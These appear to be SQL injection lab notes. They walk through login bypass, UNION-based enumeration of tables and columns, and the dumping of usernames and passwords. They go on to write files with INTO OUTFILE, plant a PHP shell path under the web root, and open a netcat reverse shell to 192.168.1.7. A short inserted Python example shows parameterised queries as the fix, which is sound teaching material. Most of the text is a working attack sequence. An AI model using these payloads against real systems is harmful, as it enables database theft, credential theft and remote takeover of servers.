SQL injection is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
SQL is a standard language for storing, manipulating and retrieving data in databases.
- Start the MySQL service and log in.
- Create a database named security.
Syntax - create database Database_name;
Then use the show tables; command to check which tables exist in the database.
- Now create the table user and add columns to it.
Syntax - Create table table_name(Column_name1 data_type, Column_name2 data_type, ....);
- Insert values into the table.
Syntax - Insert into table_name(Column_name1, Column_name2, ....) values (Value1, Value2, ....);
- To select all data in the table user:
command - Select * from user;
- To see the current database, use the command - select database();
- To see all usernames present in the table user:
command - select username from user;
- Login query - Select password from user where username = 'root';
- Payload - username='root ' or '1' = '1 ';
- To select only the first password field, use the payload - username='root ' or '1' = '1' limit 1 # ';
- To select the first two password fields, use the payload - username='root ' or '1' = '1' limit 0,2 # ';
- To select the second password field only, use the payload - username='root ' or '1' = '1' limit 1,1 # ';
- For the 3rd password field, use the payload - username='root ' or '1' = '1' limit 2,1 # ';
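Why the login query above breaks: it is built by string concatenation, so the quote in the input ends the string literal and the rest becomes SQL. The following is an added example (not part of these notes) that puts that concatenated form beside a parameterised query, using an in-memory SQLite table constructed here to stand in for the MySQL table user.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the lab's `user` table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "root", "rootpw"), (2, "alice", "alicepw"), (3, "bob", "bobpw")],
    )
    return conn


def lookup_vulnerable(conn, username):
    # The login query assembled by concatenation: a quote inside `username`
    # closes the literal, so the remainder of the input is executed as SQL.
    query = f"SELECT password FROM user WHERE username = '{username}' ORDER BY id"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    # Parameterised form: the driver passes the value separately from the
    # statement text, so quotes and keywords in it are only data.
    rows = conn.execute(
        "SELECT password FROM user WHERE username = ? ORDER BY id", (username,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    tampered = "root' or '1'='1"        # the notes' login payload, no trailing spaces
    print(lookup_vulnerable(db, "root"))   # one row, as intended
    print(lookup_vulnerable(db, tampered)) # every password: the OR is now part of the SQL
    print(lookup_safe(db, tampered))       # no such username, so nothing is returned
```

A login lookup that returns more than one row is itself a signal worth logging; a correct query for a unique username can never produce that.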
- id=1 (the URL parameter used in the payloads that follow)
- To check whether error-based SQL injection exists, type a single quote '.
Payload - ?id=1'
- Payload - ?id=' or 'a'='a
- Try to balance the SQL statement: ?id=' --+
- Payload - ?id=' order by 1 --+ to get the number of columns.
- Increase the column number until you get an SQL error.
Payload - ?id=' order by 4 --+
Here it gives the error Unknown column '4' in 'order clause', which means 3 columns exist.
- Payload - ?id=' union select 1,2,3 --+ to find the vulnerable columns. Here 2 and 3 are reflected from the database, meaning the 2nd and 3rd columns are vulnerable to SQL injection.
- Database and version:
Payload - ?id=-99' union select 1,database(), version() --+
Database - security
Version - 5.1.73
- select table_name from information_schema.tables; - used to retrieve tables from other databases
- select table_name from information_schema.tables where table_schema=database(); - to retrieve tables from the current database
- Payload - ?id=-99' union select 1,2,table_name from information_schema.tables where table_schema=database() --+
- Use group_concat() to retrieve all tables in one row.
Payload - ?id=-99' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
- To retrieve the table names in the login field (2nd column).
Payload 1 - ?id=-99' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Payload 2 (subquery form) - ?id=-99' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
- To retrieve column names:
Payload - ?id=-99' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
- To retrieve all usernames and passwords from the table users:
Payload - ?id=-99' union select 1,group_concat(username),group_concat(password) from users --+
- Retrieve data from the table user.
- To save the result, use the command - select * from users into outfile "/tmp/sql_file";
- To save the passwords in the temp folder.
Payload - ?id=-99' union select 1,2,password from users into outfile "/tmp/cred" --+
Payload - ?id=-99' union select 1,2,"Awesome" into outfile "/tmp/cred1" --+
Payload - ?id=-99' union select 1,2,"" into outfile "/var/www/html/write/shell.php" --+
a. Start listening on a port using the nc command: nc -nlvp 6001
b. Use the command nc -e /bin/bash 192.168.1.7 6001 to get a reverse shell.
